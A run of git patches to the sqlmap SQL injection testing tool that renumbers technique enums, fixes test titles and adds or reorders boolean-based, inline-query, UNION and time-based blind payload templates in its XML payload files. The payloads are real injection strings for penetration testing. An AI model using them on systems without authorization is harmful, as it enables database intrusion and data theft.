         <level>4</level>
         <risk>2</risk>
@@ -1392,7 +1393,7 @@
     </test>
 
     <test>
-        <title>PostgreSQL &gt; 8.1 time-based blind - GROUP BY and ORDER BY clauses</title>
+        <title>PostgreSQL &gt; 8.1 time-based blind - GROUP BY and ORDER BY clause</title>
         <stype>5</stype>
         <level>3</level>
         <risk>1</risk>
@@ -1412,7 +1413,7 @@
     </test>
 
     <test>
-        <title>PostgreSQL time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
+        <title>PostgreSQL time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>
@@ -1431,7 +1432,7 @@
     </test>
 
     <test>
-        <title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses</title>
+        <title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clause</title>
         <stype>5</stype>
         <level>3</level>
         <risk>1</risk>
@@ -1473,10 +1474,10 @@
     </test>
 
     <test>
-        <title>Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_LOCK.SLEEP)</title>
+        <title>Oracle time-based blind - GROUP BY and ORDER BY clause (DBMS_LOCK.SLEEP)</title>
         <stype>5</stype>
         <level>3</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
         <vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</vector>
@@ -1492,7 +1493,7 @@
     </test>
 
     <test>
-        <title>Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_PIPE.RECEIVE_MESSAGE)</title>
+        <title>Oracle time-based blind - GROUP BY and ORDER BY clause (DBMS_PIPE.RECEIVE_MESSAGE)</title>
         <stype>5</stype>
         <level>3</level>
         <risk>1</risk>
@@ -1511,7 +1512,7 @@
     </test>
 
     <test>
-        <title>Oracle time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
+        <title>Oracle time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>
@@ -1530,7 +1531,7 @@
     </test>
 
     <test>
-        <title>HSQLDB &gt;= 1.7.2 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
+        <title>HSQLDB &gt;= 1.7.2 time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>
@@ -1551,7 +1552,7 @@
     </test>    
     
     <test>
-        <title>HSQLDB &gt; 2.0 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
+        <title>HSQLDB &gt; 2.0 time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>

From 214b9360e93579ec17778a1cd35f0e42be863b6a Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Fri, 20 Feb 2015 18:30:42 +0000
Subject: [PATCH 351/492] Minor fix to check for inline query payloads
 regardless of previously identified payloads and code cleanup

---
 lib/controller/checks.py | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 2683accf6..c86a3f61b 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -179,7 +179,6 @@ def checkSqlInjection(place, parameter, value):
                 logger.debug(debugMsg)
                 continue
 
-
             # Skip DBMS-specific test if it does not match either the
             # previously identified or the user's provided DBMS (either
             # from program switch or from parsed error message(s))
@@ -250,11 +249,11 @@ def checkSqlInjection(place, parameter, value):
 
             if clause != [0] and injection.clause and injection.clause != [0] and not clauseMatch:
                 debugMsg = "skipping test '%s' because the clauses " % title
-                debugMsg += "differs from the clause already identified"
+                debugMsg += "differ from the clause already identified"
                 logger.debug(debugMsg)
                 continue
 
-            # Skip test if the user provided custom character
+            # Skip test if the user provided custom character (for UNION-based payloads)
             if conf.uChar is not None and ("random number" in title or "(NULL)" in title):
                 debugMsg = "skipping test '%s' because the user " % title
                 debugMsg += "provided a specific character, %s" % conf.uChar
@@ -314,14 +313,13 @@ def checkSqlInjection(place, parameter, value):
                 # Parse boundary's <prefix>, <suffix> and <ptype>
                 prefix = boundary.prefix if boundary.prefix else ""
                 suffix = boundary.suffix if boundary.suffix else ""
+                ptype = boundary.ptype
 
                 # Options --prefix/--suffix have a higher priority (if set by user)
                 prefix = conf.prefix if conf.prefix is not None else prefix
                 suffix = conf.suffix if conf.suffix is not None else suffix
                 comment = None if conf.suffix is not None else comment
 
-                ptype = boundary.ptype
-
                 # If the previous injections succeeded, we know which prefix,
                 # suffix and parameter type to use for further tests, no
                 # need to cycle through the boundaries for the following tests
@@ -329,7 +327,9 @@ def checkSqlInjection(place, parameter, value):
                 condBound &= (injection.prefix != prefix or injection.suffix != suffix)
                 condType = injection.ptype is not None and injection.ptype != ptype
 
-                if condBound or condType:
+                # If the payload is an inline query test for it regardless
+                # of previously identified injection types
+                if stype != PAYLOAD.TECHNIQUE.QUERY and (condBound or condType):
                     continue
 
                 # For each test's <where>

From 1ecb921ba766da32d8994266d7904e5590e77155 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Fri, 20 Feb 2015 18:31:47 +0000
Subject: [PATCH 352/492] Consistency in enums

---
 lib/core/enums.py               |  8 ++--
 xml/payloads/06_union_query.xml | 72 ++++++++++++++++-----------------
 2 files changed, 40 insertions(+), 40 deletions(-)

diff --git a/lib/core/enums.py b/lib/core/enums.py
index 816111514..cb1b7b36f 100644
--- a/lib/core/enums.py
+++ b/lib/core/enums.py
@@ -208,10 +208,10 @@ class PAYLOAD:
     SQLINJECTION = {
                         1: "boolean-based blind",
                         2: "error-based",
-                        3: "UNION query",
+                        3: "inline query",
                         4: "stacked queries",
                         5: "AND/OR time-based blind",
-                        6: "inline query",
+                        6: "UNION query",
                    }
 
     PARAMETER = {
@@ -250,10 +250,10 @@ class PAYLOAD:
     class TECHNIQUE:
         BOOLEAN = 1
         ERROR = 2
-        UNION = 3
+        QUERY = 3
         STACKED = 4
         TIME = 5
-        QUERY = 6
+        UNION = 6
 
     class WHERE:
         ORIGINAL = 1
diff --git a/xml/payloads/06_union_query.xml b/xml/payloads/06_union_query.xml
index a3ec3f4b1..3a1218c90 100644
--- a/xml/payloads/06_union_query.xml
+++ b/xml/payloads/06_union_query.xml
@@ -4,7 +4,7 @@
     <!-- UNION query tests -->
     <test>
         <title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>1</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -26,7 +26,7 @@
 
     <test>
         <title>MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>1</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -48,7 +48,7 @@
 
     <test>
         <title>MySQL UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>3</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -70,7 +70,7 @@
 
     <test>
         <title>MySQL UNION query ([CHAR]) - 1 to 10 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>1</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -92,7 +92,7 @@
 
     <test>
         <title>MySQL UNION query (NULL) - 1 to 10 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>1</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -114,7 +114,7 @@
 
     <test>
         <title>MySQL UNION query ([RANDNUM]) - 1 to 10 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>3</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -136,7 +136,7 @@
 
     <test>
         <title>MySQL UNION query ([CHAR]) - 11 to 20 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>2</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -158,7 +158,7 @@
 
     <test>
         <title>MySQL UNION query (NULL) - 11 to 20 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>2</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -180,7 +180,7 @@
 
     <test>
         <title>MySQL UNION query ([RANDNUM]) - 11 to 20 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>3</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -202,7 +202,7 @@
 
     <test>
         <title>MySQL UNION query ([CHAR]) - 21 to 30 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>3</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -224,7 +224,7 @@
 
     <test>
         <title>MySQL UNION query (NULL) - 21 to 30 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>3</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -246,7 +246,7 @@
 
     <test>
         <title>MySQL UNION query ([RANDNUM]) - 21 to 30 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>4</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -268,7 +268,7 @@
 
     <test>
         <title>MySQL UNION query ([CHAR]) - 31 to 40 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>4</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -290,7 +290,7 @@
 
     <test>
         <title>MySQL UNION query (NULL) - 31 to 40 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>4</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -312,7 +312,7 @@
 
     <test>
         <title>MySQL UNION query ([RANDNUM]) - 31 to 40 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>5</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -334,7 +334,7 @@
 
     <test>
         <title>MySQL UNION query ([CHAR]) - 41 to 50 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>5</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -356,7 +356,7 @@
 
     <test>
         <title>MySQL UNION query (NULL) - 41 to 50 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>5</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -378,7 +378,7 @@
 
     <test>
         <title>MySQL UNION query ([RANDNUM]) - 41 to 50 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>5</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -400,7 +400,7 @@
 
     <test>
         <title>Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>1</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -419,7 +419,7 @@
 
     <test>
         <title>Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>1</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -438,7 +438,7 @@
 
     <test>
         <title>Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>3</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -457,7 +457,7 @@
 
     <test>
         <title>Generic UNION query ([CHAR]) - 1 to 10 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>1</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -476,7 +476,7 @@
 
     <test>
         <title>Generic UNION query (NULL) - 1 to 10 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>1</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -495,7 +495,7 @@
 
     <test>
         <title>Generic UNION query ([RANDNUM]) - 1 to 10 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>3</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -514,7 +514,7 @@
 
     <test>
         <title>Generic UNION query ([CHAR]) - 11 to 20 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>2</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -533,7 +533,7 @@
 
     <test>
         <title>Generic UNION query (NULL) - 11 to 20 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>2</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -552,7 +552,7 @@
 
     <test>
         <title>Generic UNION query ([RANDNUM]) - 11 to 20 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>3</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -571,7 +571,7 @@
 
     <test>
         <title>Generic UNION query ([CHAR]) - 21 to 30 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>3</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -590,7 +590,7 @@
 
     <test>
         <title>Generic UNION query (NULL) - 21 to 30 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>3</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -609,7 +609,7 @@
 
     <test>
         <title>Generic UNION query ([RANDNUM]) - 21 to 30 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>4</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -628,7 +628,7 @@
 
     <test>
         <title>Generic UNION query ([CHAR]) - 31 to 40 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>4</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -647,7 +647,7 @@
 
     <test>
         <title>Generic UNION query (NULL) - 31 to 40 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>4</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -666,7 +666,7 @@
 
     <test>
         <title>Generic UNION query ([RANDNUM]) - 31 to 40 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>5</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -685,7 +685,7 @@
 
     <test>
         <title>Generic UNION query ([CHAR]) - 41 to 50 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>5</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -703,7 +703,7 @@
     </test>
     <test>
         <title>Generic UNION query (NULL) - 41 to 50 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>5</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
@@ -722,7 +722,7 @@
 
     <test>
         <title>Generic UNION query ([RANDNUM]) - 41 to 50 columns</title>
-        <stype>3</stype>
+        <stype>6</stype>
         <level>5</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>

From 2d886011c803b6b1d12d983e6d748e401497bb84 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Fri, 20 Feb 2015 18:33:04 +0000
Subject: [PATCH 353/492] Consistency in enums

---
 xml/payloads/03_inline_query.xml | 22 +++++++++++++---------
 1 file changed, 13 insertions(+), 9 deletions(-)

diff --git a/xml/payloads/03_inline_query.xml b/xml/payloads/03_inline_query.xml
index 595ff3dab..e9d6e643a 100644
--- a/xml/payloads/03_inline_query.xml
+++ b/xml/payloads/03_inline_query.xml
@@ -4,14 +4,18 @@
     <!-- Inline queries tests -->
     <test>
         <title>MySQL inline queries</title>
-        <stype>6</stype>
+        <stype>3</stype>
         <level>1</level>
         <risk>1</risk>
         <clause>1,2,3,8</clause>
         <where>3</where>
         <vector>(SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
         <request>
+            <!-- These work as good as ELT(), but are longer
             <payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
+            <payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
+            -->
+            <payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -23,7 +27,7 @@
 
     <test>
         <title>PostgreSQL inline queries</title>
-        <stype>6</stype>
+        <stype>3</stype>
         <level>1</level>
         <risk>1</risk>
         <clause>1,2,3,8</clause>
@@ -42,7 +46,7 @@
 
     <test>
         <title>Microsoft SQL Server/Sybase inline queries</title>
-        <stype>6</stype>
+        <stype>3</stype>
         <level>1</level>
         <risk>1</risk>
         <clause>1,2,3,8</clause>
@@ -63,8 +67,8 @@
 
     <test>
         <title>Oracle inline queries</title>
-        <stype>6</stype>
-        <level>1</level>
+        <stype>3</stype>
+        <level>2</level>
         <risk>1</risk>
         <clause>1,2,3,8</clause>
         <where>3</where>
@@ -82,8 +86,8 @@
 
     <test>
         <title>SQLite inline queries</title>
-        <stype>6</stype>
-        <level>1</level>
+        <stype>3</stype>
+        <level>3</level>
         <risk>1</risk>
         <clause>1,2,3,8</clause>
         <where>3</where>
@@ -100,8 +104,8 @@
     </test>
     <test>
         <title>Firebird inline queries</title>
-        <stype>6</stype>
-        <level>2</level>
+        <stype>3</stype>
+        <level>3</level>
         <risk>1</risk>
         <clause>1,2,3,8</clause>
         <where>3</where>

From 9fed41ddc21b93587b4ae9352ca3da8332f34a70 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Fri, 20 Feb 2015 18:34:23 +0000
Subject: [PATCH 354/492] Major consistency rework of boolean payloads - issue
 #1169

---
 xml/payloads/01_boolean_blind.xml | 357 ++++++++++++++----------------
 1 file changed, 169 insertions(+), 188 deletions(-)

diff --git a/xml/payloads/01_boolean_blind.xml b/xml/payloads/01_boolean_blind.xml
index 4b5fe3901..76a1aaadd 100644
--- a/xml/payloads/01_boolean_blind.xml
+++ b/xml/payloads/01_boolean_blind.xml
@@ -13,10 +13,10 @@ Tag: <test>
         Valid values:
             1: Boolean-based blind SQL injection
             2: Error-based queries SQL injection
-            3: UNION query SQL injection
+            3: Inline queries SQL injection
             4: Stacked queries SQL injection
             5: Time-based blind SQL injection
-            6: Inline queries SQL injection
+            6: UNION query SQL injection
 
     Sub-tag: <level>
         From which level check for this test.
@@ -170,6 +170,22 @@ Tag: <test>
         </response>
     </test>
 
+    <test>
+        <title>OR boolean-based blind - WHERE or HAVING clause</title>
+        <stype>1</stype>
+        <level>1</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [INFERENCE]</vector>
+        <request>
+            <payload>OR [RANDNUM]=[RANDNUM]</payload>
+        </request>
+        <response>
+            <comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+    </test>
+
     <test>
         <title>AND boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
         <stype>1</stype>
@@ -187,6 +203,23 @@ Tag: <test>
         </response>
     </test>
 
+    <test>
+        <title>OR boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
+        <stype>1</stype>
+        <level>2</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [INFERENCE]</vector>
+        <request>
+            <payload>OR [RANDNUM]=[RANDNUM]</payload>
+            <comment>-- </comment>
+        </request>
+        <response>
+            <comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+    </test>
+
     <test>
         <title>AND boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
         <stype>1</stype>
@@ -207,39 +240,6 @@ Tag: <test>
         </details>
     </test>
 
-    <test>
-        <title>OR boolean-based blind - WHERE or HAVING clause</title>
-        <stype>1</stype>
-        <level>1</level>
-        <risk>3</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR ([INFERENCE])</vector>
-        <request>
-            <payload>OR ([RANDNUM]=[RANDNUM])</payload>
-        </request>
-        <response>
-            <comparison>OR ([RANDNUM]=[RANDNUM1])</comparison>
-        </response>
-    </test>
-
-    <test>
-        <title>OR boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
-        <stype>1</stype>
-        <level>2</level>
-        <risk>3</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR ([INFERENCE])</vector>
-        <request>
-            <payload>OR ([RANDNUM]=[RANDNUM])</payload>
-            <comment>-- </comment>
-        </request>
-        <response>
-            <comparison>OR ([RANDNUM]=[RANDNUM1])</comparison>
-        </response>
-    </test>
-
     <test>
         <title>OR boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
         <stype>1</stype>
@@ -247,13 +247,13 @@ Tag: <test>
         <risk>3</risk>
         <clause>1</clause>
         <where>2</where>
-        <vector>OR ([INFERENCE])</vector>
+        <vector>OR [INFERENCE]</vector>
         <request>
-            <payload>OR ([RANDNUM]=[RANDNUM])</payload>
+            <payload>OR [RANDNUM]=[RANDNUM]</payload>
             <comment>#</comment>
         </request>
         <response>
-            <comparison>OR ([RANDNUM]=[RANDNUM1])</comparison>
+            <comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
         </response>
         <details>
             <dbms>MySQL</dbms>
@@ -261,7 +261,47 @@ Tag: <test>
     </test>
 
     <test>
-        <title>MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)</title>
+        <title>AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [INFERENCE]</vector>
+        <request>
+            <payload>AND [RANDNUM]=[RANDNUM]</payload>
+            <comment>%16</comment>
+        </request>
+        <response>
+            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+        <details>
+            <dbms>Microsoft Access</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [INFERENCE]</vector>
+        <request>
+            <payload>OR [RANDNUM]=[RANDNUM]</payload>
+            <comment>%16</comment>
+        </request>
+        <response>
+            <comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+        <details>
+            <dbms>Microsoft Access</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
         <stype>1</stype>
         <level>2</level>
         <risk>1</risk>
@@ -395,35 +435,83 @@ Tag: <test>
 
     <!-- Boolean-based blind tests - Parameter replace -->
     <test>
-        <title>Generic boolean-based blind - Parameter replace</title>
+        <title>MySQL &gt;= 5.0 boolean-based blind - Parameter replace</title>
+        <stype>1</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0 boolean-based blind - Parameter replace (original value)</title>
         <stype>1</stype>
         <level>2</level>
         <risk>1</risk>
         <clause>1,2,3</clause>
         <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</vector>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
         <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</payload>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
         </request>
         <response>
-            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</comparison>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
         </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0</dbms_version>
+        </details>
     </test>
 
     <test>
-        <title>Generic boolean-based blind - Parameter replace (original value)</title>
+        <title>MySQL &lt; 5.0 boolean-based blind - Parameter replace</title>
+        <stype>1</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&lt; 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0 boolean-based blind - Parameter replace (original value)</title>
         <stype>1</stype>
         <level>3</level>
         <risk>1</risk>
         <clause>1,2,3</clause>
         <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
         <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
         </request>
         <response>
-            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
         </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&lt; 5.0</dbms_version>
+        </details>
     </test>
 
     <test>
@@ -505,7 +593,7 @@ Tag: <test>
     <test>
         <title>MySQL boolean-based blind - Parameter replace (bool*int)</title>
         <stype>1</stype>
-        <level>5</level>
+        <level>4</level>
         <risk>1</risk>
         <clause>1,2,3</clause>
         <where>3</where>
@@ -540,84 +628,6 @@ Tag: <test>
         </details>
     </test>
 
-    <test>
-        <title>MySQL &gt;= 5.0 boolean-based blind - Parameter replace</title>
-        <stype>1</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
-        </request>
-        <response>
-            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.0 boolean-based blind - Parameter replace (original value)</title>
-        <stype>1</stype>
-        <level>2</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
-        <request>
